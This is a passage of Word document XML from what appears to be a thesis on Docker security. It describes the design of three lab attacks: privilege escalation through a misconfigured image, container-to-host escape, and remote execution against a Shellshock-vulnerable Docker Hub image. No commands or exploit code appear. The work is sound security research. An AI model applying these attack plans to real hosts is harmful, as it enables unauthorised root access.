          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="002662EE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: the project plan</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="76"/>
    </w:p>
    <w:p w14:paraId="5AF57C3E" w14:textId="16AC40A0" w:rsidR="00CE5A27" w:rsidRDefault="00CE5A27" w:rsidP="00CE5A27"/>
    <w:p w14:paraId="6937F564" w14:textId="77777777" w:rsidR="00CE5A27" w:rsidRPr="00CE5A27" w:rsidRDefault="00CE5A27" w:rsidP="00CE5A27"/>
    <w:p w14:paraId="0A16AE26" w14:textId="4576445D" w:rsidR="002662EE" w:rsidRDefault="002662EE" w:rsidP="002662EE">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="77" w:name="_Toc86859288"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>SUMMARY</w:t>
      </w:r>
      <w:bookmarkEnd w:id="77"/>
    </w:p>
    <w:p w14:paraId="65297588" w14:textId="5F8DB2E1" w:rsidR="00120A8C" w:rsidRDefault="00120A8C" w:rsidP="00120A8C">
      <w:r>
        <w:t xml:space="preserve">This chapter covered the various approaches and methodologies used to develop </w:t>
      </w:r>
      <w:r w:rsidR="005E5432">
        <w:t>the project</w:t>
      </w:r>
      <w:r w:rsidR="00BB3965">
        <w:t xml:space="preserve"> in a systematic view and coherent way</w:t>
      </w:r>
      <w:r w:rsidR="005E5432">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="008E2328">
        <w:t xml:space="preserve"> The project uses experiment and observation methods through scientific evidence to examine Docker security, and thus uses positivism as its research philosophy. It also uses cross-sectional time </w:t>
      </w:r>
      <w:r w:rsidR="00BB3965">
        <w:t>horizon</w:t>
      </w:r>
      <w:r w:rsidR="008E2328">
        <w:t xml:space="preserve"> as data is observed and collected in a short period of time.</w:t>
      </w:r>
      <w:r w:rsidR="00BB3965">
        <w:t xml:space="preserve"> Data is collected through research, experiment, and observation, and using secondary sources, such as google scholar and IEEE library. This chapter has helped the author to establish a structured view </w:t>
      </w:r>
      <w:r w:rsidR="00A26A3C">
        <w:t xml:space="preserve">of </w:t>
      </w:r>
      <w:r w:rsidR="00BB3965">
        <w:t xml:space="preserve">the project </w:t>
      </w:r>
      <w:r w:rsidR="00195A57">
        <w:t xml:space="preserve">in order to </w:t>
      </w:r>
      <w:r w:rsidR="00BB3965">
        <w:t xml:space="preserve">achieve </w:t>
      </w:r>
      <w:r w:rsidR="00195A57">
        <w:t>its</w:t>
      </w:r>
      <w:r w:rsidR="00BB3965">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008F0058">
        <w:t>objectives.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12BB56F4" w14:textId="4B530387" w:rsidR="00BB3965" w:rsidRPr="00120A8C" w:rsidRDefault="00BB3965" w:rsidP="00120A8C">
      <w:r>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidR="008F0058">
        <w:t xml:space="preserve">following chapter presents the design and implementation process used for the experiment. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="200A9BD7" w14:textId="17951AFC" w:rsidR="002662EE" w:rsidRDefault="002662EE" w:rsidP="002662EE"/>
    <w:p w14:paraId="4E38F277" w14:textId="79BAA38E" w:rsidR="00CD1685" w:rsidRDefault="00CD1685" w:rsidP="002662EE"/>
    <w:p w14:paraId="0821871C" w14:textId="0948EEDA" w:rsidR="00CD1685" w:rsidRDefault="00CD1685" w:rsidP="002662EE"/>
    <w:p w14:paraId="4DFFE514" w14:textId="6D041FD5" w:rsidR="00CD1685" w:rsidRDefault="00CD1685" w:rsidP="002662EE"/>
    <w:p w14:paraId="524619FA" w14:textId="665F5F5D" w:rsidR="00CD1685" w:rsidRDefault="00CD1685" w:rsidP="002662EE"/>
    <w:p w14:paraId="73DA60ED" w14:textId="1BC564C1" w:rsidR="00CD1685" w:rsidRDefault="00CD1685" w:rsidP="002662EE"/>
    <w:p w14:paraId="7EB6EEF1" w14:textId="4AF9818C" w:rsidR="00CD1685" w:rsidRDefault="00CD1685" w:rsidP="002662EE"/>
    <w:p w14:paraId="60EBA436" w14:textId="4B0788FA" w:rsidR="00CD1685" w:rsidRDefault="00CD1685" w:rsidP="002662EE"/>
    <w:p w14:paraId="7B1EC518" w14:textId="667C2799" w:rsidR="00CD1685" w:rsidRDefault="00CD1685" w:rsidP="002662EE"/>
    <w:p w14:paraId="4407F86A" w14:textId="00D1E090" w:rsidR="00CD1685" w:rsidRDefault="00CD1685" w:rsidP="002662EE"/>
    <w:p w14:paraId="0EA0B6ED" w14:textId="469667EF" w:rsidR="00CD1685" w:rsidRDefault="00CD1685" w:rsidP="002662EE"/>
    <w:p w14:paraId="131E05E5" w14:textId="01D4D7B2" w:rsidR="00CD1685" w:rsidRDefault="00CD1685" w:rsidP="002662EE"/>
    <w:p w14:paraId="5D636F4D" w14:textId="77777777" w:rsidR="00CD1685" w:rsidRPr="002662EE" w:rsidRDefault="00CD1685" w:rsidP="002662EE"/>
    <w:p w14:paraId="6BA5DCE4" w14:textId="77777777" w:rsidR="00732A5A" w:rsidRDefault="00732A5A" w:rsidP="00734A5B"/>
    <w:p w14:paraId="202B888E" w14:textId="77777777" w:rsidR="00696A58" w:rsidRPr="004D70A9" w:rsidRDefault="00696A58" w:rsidP="00696A58"/>
    <w:p w14:paraId="43C9FA07" w14:textId="5CAD1F99" w:rsidR="00696A58" w:rsidRDefault="00CE5A27" w:rsidP="00CE5A27">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="78" w:name="_Toc86859289"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>- DESIGN AND IMPLEMENTATION</w:t>
      </w:r>
      <w:bookmarkEnd w:id="78"/>
    </w:p>
    <w:p w14:paraId="78A20686" w14:textId="7CA25CF0" w:rsidR="00CE5A27" w:rsidRDefault="00CE5A27" w:rsidP="00CE5A27">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="79" w:name="_Toc86859290"/>
      <w:r>
        <w:t>Overview</w:t>
      </w:r>
      <w:bookmarkEnd w:id="79"/>
    </w:p>
    <w:p w14:paraId="7BD46CC1" w14:textId="4B4B176E" w:rsidR="009F7527" w:rsidRDefault="009F7527" w:rsidP="009F7527">
      <w:r>
        <w:t xml:space="preserve">In recent years, containerisation has become the prominent technology for portability, scalability, reliability, and speed, replacing the traditional VM technology. By far, Docker is now the most popular container </w:t>
      </w:r>
      <w:r w:rsidR="004C5D9D">
        <w:t>technology.</w:t>
      </w:r>
      <w:r w:rsidR="00C02F03">
        <w:t xml:space="preserve"> However, its security platform has not been tested enough and thus creates </w:t>
      </w:r>
      <w:r w:rsidR="00257C6C">
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="00C02F03">
        <w:t>big security concern for Docker users, developers, and enterprises. This chapter outlines the design and implementation of</w:t>
      </w:r>
      <w:r w:rsidR="00661969">
        <w:t xml:space="preserve"> conducting security attacks on Docker environment based upon the information and knowledge gained from the literature review. It </w:t>
      </w:r>
      <w:r w:rsidR="00E84EBF">
        <w:t xml:space="preserve">also </w:t>
      </w:r>
      <w:r w:rsidR="00661969">
        <w:t>covers all the hardware and tools used, as well as the implementation process of each attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08C033C2" w14:textId="6CA193C7" w:rsidR="00257C6C" w:rsidRDefault="00257C6C" w:rsidP="00257C6C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="80" w:name="_Toc86859291"/>
      <w:r>
        <w:t>PROBLEM FORMULATION</w:t>
      </w:r>
      <w:bookmarkEnd w:id="80"/>
    </w:p>
    <w:p w14:paraId="0DAF184E" w14:textId="62B3856F" w:rsidR="00CC18C7" w:rsidRDefault="00CC18C7" w:rsidP="00CC18C7">
      <w:r>
        <w:t>Docker has become the dominant technology in the containerisation industry for many reasons, including speed, flexibility, scalability, and portability.</w:t>
      </w:r>
      <w:r w:rsidR="00BB044C">
        <w:t xml:space="preserve"> Docker is an extension of LXC</w:t>
      </w:r>
      <w:r w:rsidR="00A92A07">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BB044C">
        <w:t xml:space="preserve">and thus has </w:t>
      </w:r>
      <w:r w:rsidR="00A92A07">
        <w:t>many</w:t>
      </w:r>
      <w:r w:rsidR="00BB044C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A92A07">
        <w:t>similarities</w:t>
      </w:r>
      <w:r w:rsidR="00BB044C">
        <w:t xml:space="preserve"> with Linux OS. In Docker, images are the building blocks to build a Docker container</w:t>
      </w:r>
      <w:r w:rsidR="008C0EFB">
        <w:t xml:space="preserve"> and</w:t>
      </w:r>
      <w:r w:rsidR="00055ED0">
        <w:t xml:space="preserve"> are stored in public or private repositories.</w:t>
      </w:r>
      <w:r w:rsidR="008C0EFB">
        <w:t xml:space="preserve"> By default, Docker uses </w:t>
      </w:r>
      <w:r w:rsidR="00A92A07">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="008C0EFB">
        <w:t>Docker hub as its public repository, enabling users to pull or push images. Simply put, Docker hub is much like google or apple store</w:t>
      </w:r>
      <w:r w:rsidR="00A92A07">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="008C0EFB">
        <w:t xml:space="preserve"> where everyone can download or upload their images. Therefore, a malicious user can</w:t>
      </w:r>
      <w:r w:rsidR="00053416">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005A679B">
        <w:t xml:space="preserve">insert a code into an image and upload </w:t>
      </w:r>
      <w:r w:rsidR="00A92A07">
        <w:t xml:space="preserve">it </w:t>
      </w:r>
      <w:r w:rsidR="005A679B">
        <w:t xml:space="preserve">to </w:t>
      </w:r>
      <w:r w:rsidR="00A92A07">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="005A679B">
        <w:t>Docker hub</w:t>
      </w:r>
      <w:r w:rsidR="00A92A07">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00651EDA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005A679B">
        <w:t>and someone can pull that image</w:t>
      </w:r>
      <w:r w:rsidR="00A92A07">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00651EDA">
        <w:t xml:space="preserve">more likely to expose </w:t>
      </w:r>
      <w:r w:rsidR="00A92A07">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00651EDA">
        <w:t>containers and the host to the attacker.</w:t>
      </w:r>
      <w:r w:rsidR="00081A8E">
        <w:t xml:space="preserve"> An attacker can also gain access through an image that is not configured correctly.</w:t>
      </w:r>
      <w:r w:rsidR="00D85F86">
        <w:t xml:space="preserve"> Therefore, this project aims to answer</w:t>
      </w:r>
      <w:r w:rsidR="006B7D13">
        <w:t xml:space="preserve"> the security implications of running untrusted Docker images</w:t>
      </w:r>
      <w:r w:rsidR="006753F6">
        <w:t>, as well as on how attackers gain access through vulnerable or misconfigured images.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63949338" w14:textId="5662969A" w:rsidR="00584D36" w:rsidRDefault="000318DB" w:rsidP="00CC18C7">
      <w:r>
        <w:t xml:space="preserve">Figure 10 outlines the various approaches and tools used to solve the above problem. As it can be seen, </w:t>
      </w:r>
      <w:r w:rsidR="00D45789">
        <w:t xml:space="preserve">three </w:t>
      </w:r>
      <w:r w:rsidR="00DF1F82">
        <w:t>different attacks comprising privilege escalation, container to host, and vulnerable application are used to demonstrate the security strength of Docker containers.</w:t>
      </w:r>
      <w:r w:rsidR="009D7532">
        <w:t xml:space="preserve"> The privilege attack uses a user with a limited privilege and a Docker image incorrectly configured to access the host machine, while the container to host attack runs two containers with different configuration</w:t>
      </w:r>
      <w:r w:rsidR="00394726">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="009D7532">
        <w:t xml:space="preserve"> to access the host</w:t>
      </w:r>
      <w:r w:rsidR="00394726">
        <w:t xml:space="preserve">. The third scenario is using </w:t>
      </w:r>
      <w:r w:rsidR="00D11DF8">
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="00394726">
        <w:t>vulnerable application downloaded from</w:t>
      </w:r>
      <w:r w:rsidR="00D11DF8">
        <w:t xml:space="preserve"> the</w:t>
      </w:r>
      <w:r w:rsidR="00394726">
        <w:t xml:space="preserve"> Docker hub. In such </w:t>
      </w:r>
      <w:r w:rsidR="00D11DF8">
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="00394726">
        <w:t>scenario,</w:t>
      </w:r>
      <w:r w:rsidR="00D11DF8">
        <w:t xml:space="preserve"> two containers as attackers used to conduct remote execution through the vulnerable application. Most tools used are Linux, and Docker commands, with a few exceptions. Further, the three attacks use a single </w:t>
      </w:r>
      <w:r w:rsidR="004E1FB6">
        <w:t>Ubuntu</w:t>
      </w:r>
      <w:r w:rsidR="00D11DF8">
        <w:t xml:space="preserve"> laptop </w:t>
      </w:r>
      <w:r w:rsidR="00D11DF8">
        <w:lastRenderedPageBreak/>
        <w:t>with Docker installed.</w:t>
      </w:r>
      <w:r w:rsidR="00E95E86">
        <w:t xml:space="preserve"> An extended and detailed diagram of each attack can be found below in the design section. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="196952EE" w14:textId="6B1AB561" w:rsidR="00D31C21" w:rsidRDefault="00B43995" w:rsidP="00D31C21">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="00126888" wp14:editId="29D574D0">
            <wp:extent cx="5731510" cy="34988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498850"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B1D1E91" w14:textId="7751F8AB" w:rsidR="00F95282" w:rsidRDefault="00F95282" w:rsidP="00F95282">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="81" w:name="_Toc86858601"/>
      <w:r w:rsidRPr="00F95282">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00F95282">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00F95282">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00F95282">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A53E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidRPr="00F95282">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00F95282">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: methods and techniques of the various attacks.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="81"/>
    </w:p>
    <w:p w14:paraId="48E87960" w14:textId="2DBCC5B5" w:rsidR="00F95282" w:rsidRDefault="00C0772B" w:rsidP="00C0772B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="82" w:name="_Toc86859292"/>
      <w:r>
        <w:t>DESIGN</w:t>
      </w:r>
      <w:bookmarkEnd w:id="82"/>
    </w:p>
    <w:p w14:paraId="106FABF8" w14:textId="49D772C0" w:rsidR="00182BA5" w:rsidRDefault="00F55A64" w:rsidP="00182BA5">
      <w:r>
        <w:t>This project aims to examine Docker security with regards to vulnerable applications, misconfigured or poisoned Docker images.</w:t>
      </w:r>
      <w:r w:rsidR="00A660E2">
        <w:t xml:space="preserve"> This project involves three different attacks to analyse Docker security utilising various approaches and tools, shown in figure 10.</w:t>
      </w:r>
      <w:r w:rsidR="00A24C2D">
        <w:t xml:space="preserve"> The project’s design is developed based on the information and data gained from the literature review.</w:t>
      </w:r>
      <w:r w:rsidR="001D76CE">
        <w:t xml:space="preserve"> The three types of attacks chosen were privilege escalation, container to host, and </w:t>
      </w:r>
      <w:r w:rsidR="00545D25">
        <w:t>vulnerable application</w:t>
      </w:r>
      <w:r w:rsidR="001D76CE">
        <w:t>, as they are the most common security threats used by threat actors</w:t>
      </w:r>
      <w:r w:rsidR="00613FFE">
        <w:t xml:space="preserve">, according to the study in </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="1197972103"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00613FFE">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00613FFE">
            <w:instrText xml:space="preserve"> CITATION RYa18 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="00613FFE">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[51]</w:t>
          </w:r>
          <w:r w:rsidR="00613FFE">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="001D76CE">
        <w:t xml:space="preserve">. In addition, such attacks are inclusive </w:t>
      </w:r>
      <w:r w:rsidR="004522C3">
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidR="000E5A59">
        <w:t>embody</w:t>
      </w:r>
      <w:r w:rsidR="004522C3">
        <w:t xml:space="preserve"> both inside and outside threats of</w:t>
      </w:r>
      <w:r w:rsidR="000E5A59">
        <w:t xml:space="preserve"> the</w:t>
      </w:r>
      <w:r w:rsidR="004522C3">
        <w:t xml:space="preserve"> Docker environment.</w:t>
      </w:r>
      <w:r w:rsidR="000E5A59">
        <w:t xml:space="preserve"> The privilege escalation and container to host attacks illustrate the inside threats, while the vulnerable application demonstrates the outside threats </w:t>
      </w:r>
      <w:r w:rsidR="008E6322">
        <w:t>to</w:t>
      </w:r>
      <w:r w:rsidR="000E5A59">
        <w:t xml:space="preserve"> the Docker ecosphere.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A15DAA" w14:textId="5132DF36" w:rsidR="004B3B9F" w:rsidRDefault="00B42DD4" w:rsidP="00182BA5">
      <w:r>
        <w:t xml:space="preserve">The initial plan of the experiment was to </w:t>
      </w:r>
      <w:r w:rsidR="00B4550B">
        <w:t xml:space="preserve">use gns3 software as a platform to execute the attacks; however, the gns3 crushes several times, and thus the author used an </w:t>
      </w:r>
      <w:r w:rsidR="004E1FB6">
        <w:t>Ubuntu</w:t>
      </w:r>
      <w:r w:rsidR="00B4550B">
        <w:t xml:space="preserve"> laptop with</w:t>
      </w:r>
      <w:r w:rsidR="00011A67">
        <w:t xml:space="preserve"> the latest</w:t>
      </w:r>
      <w:r w:rsidR="00B4550B">
        <w:t xml:space="preserve"> Docker </w:t>
      </w:r>
      <w:r w:rsidR="003625AA">
        <w:t xml:space="preserve">engine </w:t>
      </w:r>
      <w:r w:rsidR="00011A67">
        <w:t xml:space="preserve">version 20.10.7 </w:t>
      </w:r>
      <w:r w:rsidR="00B4550B">
        <w:t>packages installed.</w:t>
      </w:r>
      <w:r w:rsidR="004B3B9F">
        <w:t xml:space="preserve"> In this project, Docker is the central hub and is utilised to manage and run containers. The containers </w:t>
      </w:r>
      <w:r w:rsidR="008F6626">
        <w:t xml:space="preserve">communicate between each </w:t>
      </w:r>
      <w:r w:rsidR="008F6626">
        <w:lastRenderedPageBreak/>
        <w:t>other and the host machine through the default Docker network bridge.</w:t>
      </w:r>
      <w:r w:rsidR="004B3B9F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000F1723">
        <w:t>For the privilege escalation and container to host attacks</w:t>
      </w:r>
      <w:r w:rsidR="00885D13">
        <w:t>, the author built the</w:t>
      </w:r>
      <w:r w:rsidR="000F1723">
        <w:t xml:space="preserve"> images locally to create and run containers</w:t>
      </w:r>
      <w:r w:rsidR="00BF70E1">
        <w:t xml:space="preserve">, while the last </w:t>
      </w:r>
      <w:r w:rsidR="00885D13">
        <w:t>approach</w:t>
      </w:r>
      <w:r w:rsidR="00BF70E1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00885D13">
        <w:t>utilises</w:t>
      </w:r>
      <w:r w:rsidR="00BF70E1">
        <w:t xml:space="preserve"> an application vulnerable to shellshock downloaded from</w:t>
      </w:r>
      <w:r w:rsidR="00885D13">
        <w:t xml:space="preserve"> the</w:t>
      </w:r>
      <w:r w:rsidR="00BF70E1">
        <w:t xml:space="preserve"> Docker Hub.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E732632" w14:textId="3C9B63D0" w:rsidR="00133D1D" w:rsidRDefault="00E83F4F" w:rsidP="008C4AF1">
      <w:r>
        <w:t>The privilege attack utilise</w:t>
      </w:r>
      <w:r w:rsidR="00CA06E1">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> a single container</w:t>
      </w:r>
      <w:r w:rsidR="008E2BC2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008D191C">
        <w:t>using</w:t>
      </w:r>
      <w:r w:rsidR="008E2BC2">
        <w:t xml:space="preserve"> unprivileged user</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to</w:t>
      </w:r>
      <w:r w:rsidR="00CA06E1">
        <w:t xml:space="preserve"> access</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the host machine</w:t>
      </w:r>
      <w:r w:rsidR="008E2BC2">
        <w:t xml:space="preserve"> by exploiting vulnerabilities</w:t>
      </w:r>
      <w:r>
        <w:t>, as shown in figure 11. The image is built locally by a user with limited permission but is also part of the Docker group. The attacker exploits</w:t>
      </w:r>
      <w:r w:rsidR="00C779B5">
        <w:t xml:space="preserve"> the </w:t>
      </w:r>
      <w:r w:rsidR="008E2BC2">
        <w:t>code</w:t>
      </w:r>
      <w:r w:rsidR="008C4AF1">
        <w:t xml:space="preserve"> intending to escape and access the </w:t>
      </w:r>
      <w:r w:rsidR="004E1FB6">
        <w:t>Ubuntu</w:t>
      </w:r>
      <w:r w:rsidR="008C4AF1">
        <w:t xml:space="preserve"> laptop with root privilege. The author uses an </w:t>
      </w:r>
      <w:r w:rsidR="004E1FB6">
        <w:t>Ubuntu</w:t>
      </w:r>
      <w:r w:rsidR="008C4AF1">
        <w:t xml:space="preserve"> laptop and Docker engine to carry out the attack. The Docker image is created based on </w:t>
      </w:r>
      <w:r w:rsidR="00FA6959">
        <w:t>a Linux distribution</w:t>
      </w:r>
      <w:r w:rsidR="008C4AF1">
        <w:t xml:space="preserve"> wheezy </w:t>
      </w:r>
      <w:r w:rsidR="00FA6959">
        <w:t xml:space="preserve">because it is </w:t>
      </w:r>
      <w:r w:rsidR="00334805">
        <w:t>lightweight</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-549767324"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00334805">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00334805">
            <w:instrText xml:space="preserve"> CITATION CPo14 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="00334805">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[83]</w:t>
          </w:r>
          <w:r w:rsidR="00334805">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00FA6959">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E9D3DE" w14:textId="3C5A6435" w:rsidR="001674E9" w:rsidRDefault="000A3056" w:rsidP="001674E9">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0A777F8A" wp14:editId="04E7F5D6">
            <wp:extent cx="4305300" cy="2585520"/>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05300" cy="2585520"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C24BB4A" w14:textId="34792C2A" w:rsidR="004D5F81" w:rsidRDefault="004D5F81" w:rsidP="004D5F81">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="83" w:name="_Toc86858602"/>
      <w:r w:rsidRPr="004D5F81">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="004D5F81">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="004D5F81">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="004D5F81">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
